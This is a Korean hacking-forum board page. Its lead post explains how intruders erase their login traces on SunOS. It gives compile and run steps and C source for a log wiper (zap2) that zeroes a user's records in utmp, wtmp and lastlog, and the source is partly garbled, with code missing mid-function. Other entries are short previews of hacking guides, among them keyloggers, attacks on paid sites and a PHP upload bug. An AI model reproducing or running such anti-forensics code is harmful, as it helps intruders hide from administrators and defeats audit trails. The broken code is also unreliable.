시큐리티 (레벨5이상) 1 페이지

본문 바로가기

검색취소

시큐리티 (레벨5이상)

검색 다음
  • no image
  • 해커들이 자신의 흔적을 지우는 방법

    자신의 로긴 정보를 지우는 프로그램은 기본적으로 /etc/utmp와 /var/adm/wtmp와 /var/adm/lastlog에 대한 읽기와 쓰기권한이 있어야 합니다. SunOS 4.1.X계열의 utmp의 모드가 -rw-rw-rw-로 되어 있고 SunOS 5.X 계열의 utmp의 모드는 -rw-r-r-로 되어 있습니다. 시스템에 따라 다를 수도 있지요. 따라서, 이 프로그램을 실행해 보려고 하는 사람은 SunOS 4.1.X을 사용해야 합니다. 이는 uname -a의 명령어로 알아 볼 수 있습니다. 그런데 자신이 일반 사용자가 아닌 root라면 구지 OS의 버전에 영향을 받을 필요가 없습니다. 해커나 다른 사람이 접속하면 시스템에 /etc/utmp, /usr/adm/wtmp와 /usr/adm/lastlog 파일에 접속 기록이 남습니다. 그래서 흔적을 없애기 위해서는 위의 화일을 변경합니다. 이것들은 텍스트 파일이 아니라서 vi로 편집할 수 없고 특별한 목적을 지닌 프로그램을 작성해야 합니다. 바로 그 프로그램이 아래에 있는 프로그램입니다. C언어로 작성 되어 있습니다. 이 프로그램 말고도 여러 가지의 흔적 지우는 프로그램이 있다는 것을 알려드립니다. 아래 프로그램을 root의 권한에서 돌려서 접속흔적을 지웁니다. 유닉스 쉘 상태에서 아래 파일명을 test.c로 저장해서 cc -o rmuser test.c 로 컴파일 해서 rmuser를 실행시키면 됩니다. hack -o rmuser test.c hack%rmuser 위의 명령을 실행해서 who라고 명령 해보십시오. 깜쪽 같이 자신이 사라져 있을 겁니다. 참고로 who는 현재 시스템에 로긴해 있는 사용자를 알아보는 명령어 입니다. 프로그램 소스 tset.c의 내용 #include #include #include #include #include #include #include #include #define WTMP_NAME "/usr/adm/wtmp" #define UTMP_NAME "/etc/utmp" #define LASTLOG_NAME "/usr/adm/lastlog" int f; void kill_utmp(who) char *who; { struct utmp utmp_ent; if ((f=open(UTMP_NAME,O_RDWR))>=0) { while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 ) if (!strncmp(utmp_ent.ut_name,who,strlen(who))) { bzero((char *)&utmp_ent,sizeof( utmp_ent )); lseek (f, -(sizeof (utmp_ent)), SEEK_CUR); write (f, &utmp_ent, sizeof (utmp_ent)); } close(f); } } void kill_wtmp(who) char *who; { struct utmp utmp_ent; long pos; pos = 1L; if ((f=open(WTMP_NAME,O_RDWR))>=0) { while(pos != -1L) { lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND); if (read (f, &utmp_ent, sizeof (struct utmp))= 0) { lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0); bzero((char *)&newll,sizeof( newll )); write(f, (char *)&newll, sizeof( newll )); close(f); } } else printf("%s: ?\\n",who); } main(argc,argv) int argc; char *argv[]; { if (argc==2) { kill_lastlog(argv[1]); kill_wtmp(argv[1]); kill_utmp(argv[1]); printf("Zap2!\\n"); } else printf("Error.\\n"); }

  • no image
  • 수퍼해커의 해킹비밀 8

    사용자들에게 배포된다. 예를 들어 한 사무실의 비서들은 한 계정을 공 유하는 경우가 있다. 대화명(handle) 가명, 별명, 흔히 BBS 상에서 쓰인다. 대화모드(talk mode) 다른 사용자와의 온라인 …

  • no image
  • 해킹의 최신 형태와 방지 테크닉

    인터넷의 개방성과 정보공유 및 교환의 용이성으로 인해 인터넷사의 해킹사건은 날로 그 빈도수가 높아가며 그 유형 또한 고 도화하고 그로 인한 피해의 심각성은 하루가 다르게 변모하고 있다. 특집II에서는 5월호와 6…

  • no image
  • 요즘 빅데이터/분석/보안 관련된 기사

    요즘 빅데이터/분석/보안 관련된 기사 또는 자료들이 엄청나게 쏟아져 나온다.. 요즘 회사도 바뻐서 못쫒아갈 판이다.(사실은 핑계다) 그래도 나중에라도 읽어보려면 링크라도 정리… [IT수다]우리에게 필요한 건 ‘빅데이…

  • no image
  • 수퍼해커의 해킹비밀 7

     돈이 남아돌거나,  해킹 시 비용을 부담할 생각이라면, 해킹할  때 항 상 호텔이나  모텔에 투숙해도 된다. 돈  문제는 해커를 다른 길로  빠지게 하는 한 요소이다. 통화 요금은 빠르게 인상되고 있고  이런 이…

  • no image
  • 아래한글 2.X 암호 해독 사건

    아래한글 2.X 의 암호 크랙(CRACK) 사건 개요 슈퍼컴퓨터로도 1백30년이상 걸려야 겨우 풀 수있다는  아래아한글의 문서암호를 27세된 한 청년 컴퓨터전문가가 간단히 풀어냈다.   아래아한글 제작사인 한글과컴…

  • no image
  • 해킹 프로그램중 키로그에 대해서..

    해킹 프로그램 중에 키로거(Key Logger) 이라는 프로그램이 있죠. 키로거 계열의 해킹프로그램의 역할은 사용자가 컴퓨터를 사용하면서 치는 자판의 내용을 그대로 저장하는 역활을 합니다. 그럼 당연히 아이디와 비밀…

  • no image
  • 일반사이트 공략법!!! ( HTTP BASIC ATTACK )

    드디어 실제적인 사이트 공략법을 배워보실 차례입니다. 처음부터 차근차근히 읽어내려 오셨다면 기대가 크시겠네요.. 기대에 부흥을 할 수 있을런지.... 웹서핑을 하다보면 수많은 유료사이트들을 접하게 됩니다. 그 수많은…

  • no image
  • 해킹이란?

    해커라는 단어는 60년대 미국 M.I.T 대학생들을 시작으로 전파되기시작하였습니다. 그들은 컴퓨터를 광적으로 좋아하고 그들의 이상을 컴퓨터에걸었습니다. 밤낮으로 컴퓨터에 매달려 새로운 프로그램을 만들고 토론하며창…

  • no image
  • 해커들의 해커순서

    공격 목표 시스템 정보 수집       - 자동화된 대규모 네트워크 스캔 도구를 이용한 정보 수집       - 네트워크 구조, 운영체계 버전, 취약점 정보 등 수집   불법적인 컴퓨터 접근     - ID와 패스…

  • no image
  • 리눅스 사용로그지우기

    /etc/utmp, /usr/adm/wtmp와 /usr/adm/lastlog 파일을 변경한다. 이것들은 텍스트 파일이 아니라 서 vi로 편집할 수 없다. 특별한 목적을 지닌 프로그램을 작성해야 한다. #inclu…

  • no image
  • php 파일 업로드 버그

    현재 많은 사이트에서 사용중인 PHP게시판은 대부분 파일업로드 부분에 서 보안관련 버그가 존재합니다. 따라서 웹을 통해서 자료실등에 php스크립트를 올려서 내부 php의 소스 를 볼 수가 있습니다. 보통 파일확장…

이 게시판은 레벨3이상 읽기,쓰기 가능한 게시판입니다. 커뮤니티 활동등을 통해 신분이 확인된 분에 한해서 진입가능합니다.
보안 관련 된 글을 많이 남겨주세요.. 특히 외부에 제목만 공개되므로 자유롭게 등록가능합니다.
?>